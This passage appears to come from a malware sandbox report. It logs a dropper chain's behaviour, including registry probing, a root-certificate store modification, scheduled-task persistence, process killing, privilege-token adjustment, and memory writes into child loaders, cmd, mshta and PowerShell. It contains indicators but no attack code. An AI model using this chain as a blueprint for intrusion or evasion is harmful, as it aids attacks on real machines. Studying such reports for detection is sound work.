Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\10109150101\151fdd87ae.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109090101\3940014ab5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109110101\697c56b4fd.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Modifies system certificate store

defense_evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempAFEJAHTKFNIDCVLIXWUNAO7YTG6MNSAQ.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109090101\3940014ab5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109110101\697c56b4fd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe N/A
N/A N/A C:\ProgramData\rbkvgg\bdhx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109130101\dc32b0ba15.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109140101\765aeb8838.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\151fdd87ae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\151fdd87ae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\151fdd87ae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10109100101\d116733c4e.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2676 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe
PID 2676 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe
PID 2676 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe
PID 2676 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe
PID 3008 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 3008 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 3008 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 3008 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2728 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 2728 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 2728 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 2728 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 2336 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe C:\Windows\system32\cmd.exe
PID 2336 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe C:\Windows\system32\cmd.exe
PID 2336 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe C:\Windows\system32\cmd.exe
PID 2040 wrote to memory of 2088 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2040 wrote to memory of 2088 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2040 wrote to memory of 2088 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 1120 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 1120 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 1120 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2728 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 2728 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 2728 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 2728 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 1492 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 1492 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 1492 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 1492 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 2728 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108470101\b7ef68053e.exe
PID 2728 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108470101\b7ef68053e.exe
PID 2728 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108470101\b7ef68053e.exe
PID 2728 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108470101\b7ef68053e.exe
PID 2500 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\b7ef68053e.exe C:\Windows\SysWOW64\cmd.exe
PID 2500 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\b7ef68053e.exe C:\Windows\SysWOW64\cmd.exe
PID 2500 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\b7ef68053e.exe C:\Windows\SysWOW64\cmd.exe
PID 2500 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\b7ef68053e.exe C:\Windows\SysWOW64\cmd.exe
PID 2500 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\b7ef68053e.exe C:\Windows\SysWOW64\mshta.exe
PID 2500 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\b7ef68053e.exe C:\Windows\SysWOW64\mshta.exe
PID 2500 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\b7ef68053e.exe C:\Windows\SysWOW64\mshta.exe
PID 2500 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\b7ef68053e.exe C:\Windows\SysWOW64\mshta.exe
PID 1748 wrote to memory of 2276 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1748 wrote to memory of 2276 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1748 wrote to memory of 2276 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1748 wrote to memory of 2276 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1224 wrote to memory of 2836 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
